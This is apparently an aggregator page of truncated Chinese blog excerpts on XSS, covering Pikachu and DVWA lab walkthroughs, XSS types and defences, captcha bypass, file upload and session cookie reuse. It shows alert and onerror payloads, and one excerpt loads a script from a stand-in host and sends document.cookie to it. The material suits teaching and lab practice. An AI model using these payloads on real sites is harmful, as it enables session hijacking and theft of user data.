xss

Pikachu漏洞平台---XSS(Cross-Site Scripting) 跨站脚本

一曲冷凌霜 提交于 2020-02-12 16:37:48
XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; 危害: 存储型>反射型>DOM型 1.反射型XSS(get) 随便输入, 输入 ' " <> 特殊字符都可以原封不动得输出 可以发现没有任何过滤, 只是限制了输入字符的长度,F12修改一下即可 因为一般 前端中得输入框 会做一个长度得限制, 我们将他修改为20000 <script> alert("你好,我是一个警告框!") ;</script> // 弹窗得语法 查看后台代码,发现 后台代码并没有对你输入得东西 做任何修改 只是原封不动得输出了 总结 : 随便输入,可以发现没有任何过滤,只是限制了输入字符的长度,F12修改一下即可, 后台不会存储数据, 刷新后 不会弹窗! 输入kobe 会生成链接 http://192.168.50.100/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit# 2.反射型XSS(post) admin 123456 登陆成功后 显示 输入 kobe 会以post方式提交请求 http://192.168.50.100/pikachu

xss

元气小坏坏 提交于 2020-02-12 11:30:29
xss攻击本质: 浏览器在解析html代码的时候,遇到闭合的script标签,会执行其中的js代码,黑客利用 浏览器解析一段html代码的能力,恶意插入js代码,使得浏览器 执行黑客的代码 xss常见漏洞: 1:反射型 利用服务器在接受到浏览器发送的内容后,再直接返回给浏览器,然后浏览器 直接将返回结果显示在页面上 如:https://www.jianshu.com/p/0edad525821b 2:存储型 某些地方需要用户输入内容,并保存到数据库,下次浏览器会读取数据库内容直接显示在页面上 如:https://www.jianshu.com/p/790fb57f3acb 3:dom型 利用某些页面 直接读取页面上可以动态更改的内容,并显示在页面上 如:https://www.jianshu.com/p/790fb57f3acb 防御: 看上面的漏洞,都是因为浏览器直接显示危险内容,导致有可能解析了js代码,所以预防手段就是在显示 内容前 做危险字段过滤 来源: https://www.cnblogs.com/mrzhu/p/12298168.html

Ethical Hacking - Web Penetration Testing(12)

折月煮酒 提交于 2020-02-10 21:10:32
XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page. The code is executed when the page loads. The code is executed on the client machine, not the server. Three main types: 1. Persistent/Stored XSS 2. Reflected XSS 3. DOM-based XSS Discovering XSS Try to inject javascript code into the pages. Test text boxes and URL parameters on the form http://target.com/page.php?something=something REFLECTED XSS None persistent, not stored. Only work if the target visits a specially crafted URL. EX: http://target.com/page.php?something=<script>alert("XSS")<

漏洞利用:验证绕过,XSS利用,Cookic盗用,文件上传

早过忘川 提交于 2020-02-10 07:18:28
1. 文件上传 低级别 写好上传的内容 选择好上传的文件 上传成功。 测试:访问文件,执行代码 中级别 修改文件后缀为png 上传该文件 抓包修改文件后缀为php,然后允许数据包通过。 上传成功 测试:访问文件,执行代码 2. 验证码绕过 首先将秘钥添加到配置文件 低级别 step值1,有验证,step值2,无验证,所以将数据包step值修改为2,然后发送即可绕过。 中级别 将数据包step值修改为2,并添加passed_captch=true,然后发送即可绕过。 3. XSS利用 低级别 反射式XSS <script>alert(1);</script> 中级别 反射式XSS 使用代码:<img src=# onerror=alert(1); \> 低级别 DOM XSS 利用标签节点进行闭合 中级别 DOM XSS 低级别 存储型XSS 中级别 存储型XSS 首先获取数据包,并修改内容。 4. Cookic盗用 首先获取low的cookic值 Cookie: security=low; PHPSESSID=kpqjirtgks9iqhonoh5g4j6ih6 将难度改为impossible 启动代理模式,点击instruction,获取数据包。 将impossible的cookic改为之前获取的low的cookic,然后允许数据包通过,进行验证。 来源: https://www

Web安全

故事扮演 提交于 2020-02-06 10:45:14
网络钓鱼 网络钓鱼 (Phishing) 伪造网页以欺诈方式 获取敏感资料 用户一般是从垃圾邮件中访问网络钓鱼页面 钓鱼网站常用方式: 错误拼写URL链接 Unicode攻击 移除或伪造地址栏 可移动代码 可执行、通过网络发送、在目标电脑上执行的代码程序。 沙箱 应用程序或脚本在另一个应用程序中的运行权限 沙箱 只能访问某些文件和设备 Cookies cookie是存储在计算机上、与特定服务器关联的一小部分信息。当您访问特定网站时,它可能会将信息存储为cookie,每次您重新访问该服务器时,cookie都会被重新发送到服务器, 用于在会话中保存状态信息。 cookie可以保存任何类型的信息。可以保存敏感信息,包括密码,信用卡信息,社保号码等等。 会话型cookie 是浏览器的处理过程中保留的,是暂时性的,当浏览器关闭时则消除; 持久性cookie 是保存在客户端的硬盘上的,浏览器关闭也不会消除。 跨站脚本(XSS) 跨站脚本(XSS):攻击者将脚本代码注入Web应用程序生成的页面 XSS的发起条件 Web服务器 没有对用户输入进行有效性验证 或者验证强度不够,而又 轻易地将它们返回到客户端 允许用户在表格或编辑框中输入不相关字符 存储并允许把用户输入显示在返回给终端的页面上 ,而没有去除非法字符或者重新进行编码 客户端对XSS的防御 基于代理:

web前端安全

假装没事ソ 提交于 2020-02-05 16:05:26
1. xss: cross site scripting,跨站脚本攻击。 1.1 定义: 指的是通过存在安全漏洞的web网站注册用户的浏览器内运行非法的非本站点HTML标签或js进行的一种攻击方式。 1.2 影响: 利用虚假输入表单骗取用户个人信息。利用脚本窃取用户cookie值,帮助攻击者发送恶意请求(如伪造文章或者图片)。 1.3 案例: 1.3.1 反射型:url参数直接注入,案例如下: //1. 正常网站发送请求:参数from=Ace 窗口输入:https://xxx.com/api?from=Ace //2. 尝试xss攻击:js修改弹出弹窗alert() 窗口输入:https://xxx.com/api?from=<script>alert('尝试在当前页面修改js攻击是否成功')</script> //3. 如果尝试xss攻击成功,可以弹出弹窗,则可以尝试用xss获取用户cookie:即执行指定攻击的js代码 窗口输入:https://xxx.com/api?from=<script scr='https://xxx.com/hack.js'></script> //4. 在https://xxx.com/hack.js代码中:获取cookie var img=new Image() img.src='https://xx.com/img?c='+document

XSS中的同源策略和跨域问题

旧巷老猫 提交于 2020-02-04 06:38:28
转自 https://www.cnblogs.com/chaoyuehedy/p/5556557.html 1 同源策略 所谓同源策略,指的是浏览器对不同源的脚本或者文本的访问方式进行的限制。比如源a的js不能读取或设置引入的源b的元素属性。 那么先定义下什么是同源,所谓同源,就是指两个页面具有相同的协议,主机(也常说域名),端口,三个要素缺一不可。 可以看下面的几个示例来更加清楚的了解一下同源的概念: URL1 URL2 说明 是否允许通信 http://www.foo.com/js/a.js http://www.foo.com/js/b.js 协议、域名、端口都相同 允许 http://www.foo.com/js/a.js http://www.foo.com:8888/js/b.js 协议、域名相同,端口不同 不允许 https://www.foo.com/js/a.js http://www.foo.com/js/b.js 主机、域名相同,协议不同 不允许 http://www.foo.com/js/a.js http://www.bar.com/js/b.js 协议、端口相同,域名不同 不允许 http://www.foo.com/js/a.js http://foo.com/js/b.js 协议、端口相同,主域名相同,子域名不同 不允许

XSS Challenges学习笔记 Stage#1~ Stage#19

一世执手 提交于 2020-02-03 15:53:16
开门见山 Stage #1 http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 这一道题发现我们写入的内容直接没有任何过滤,嵌套在一个 <b> 标签里面,我们常规闭合标签新建标签即可。 <b><script>alert(document.domain)</script></b> Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1 这一题的注入点是在一个 input 标签的 value 属性那里,我们前后闭合 input 标签然后在中间加上 script 就好了。 "><script>alert(document.domain)</script><" Stage #3 http://xss-quiz.int21h.jp/stage-3.php?sid=9b217ccdc6e28f1a018d6df366553a6152bc65f5 尝试输入查看源码发现 <>和” 被转义了,于是抓包在 country 的位置插入 xss p1=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22&p2=

Web框架安全

耗尽温柔 提交于 2020-02-03 09:04:17
模板引擎与XSS防御 XSS攻击是在用户的浏览器上执行的,其形成过程则是在服务器端页面渲染时,注入了恶意的HTML代码导致的。从MVC架构来说,是发生在View层,因此使用“输出编码”的防御方法更加合理,这意味着需要针对不同上下文的XSS攻击场景,使用不同的编码方式。 “输出编码”的防御方法有以下几种: 在HTML标签中输出变量 在HTML属性中输出变量 在script标签中输出变量 在事件中输出变量 在CSS中输出变量 在URL中输出变量 针对不同的情况,使用不同的编码函数。那么现在流行的MVC框架是否符合这样的设计呢?答案是否定的。 在当前流行的MVC框架中,View层常用的技术是使用模板引擎对页面进行渲染,模板引擎本身可能会提供一些编码方法,比如,Django Templetes中,使用filters中的escape作为HtmlEncode的方法: <h1>Hello, {{name|escape}}!</h1> 最好的XSS防御方案,在不同的场景需要使用不同的编码函数,如果统一使用者5个字符的HtmlEncode,则很有可能被攻击者绕过。在模板引擎中,可以实现自定义的编码函数,应用于不同场景。在Django中是使用自定义filters,在Velocity中则可以使用“宏”(velocimacro)。 Web框架与CSRF防御 CSRF攻击的目标,一般都会产生“写数据

基本漏洞层次记录笔记

人走茶凉 提交于 2020-02-03 05:07:12
静态层 Html javascript jQuery XSS 漏洞 、 Self XSS 脚本层 ASP ASPX PHP JSP 文件包含 、 代码执行、文件上传、…… 数据层 MySQL Oracle SQL server Redis mongodb 溢出漏洞、版本过低、未授权访问 服务层 IIS NGINX Apache 不安全的HTTP方法(PUT 上传文件/DELETE 删除文件)、文件解析漏洞、版本过低 系统层 WINDOWS LINUX 远程代码执行、本地特权提升、拒绝服务 来源: CSDN 作者: 爱吃鱼L 链接: https://blog.csdn.net/qq_40980391/article/details/104090976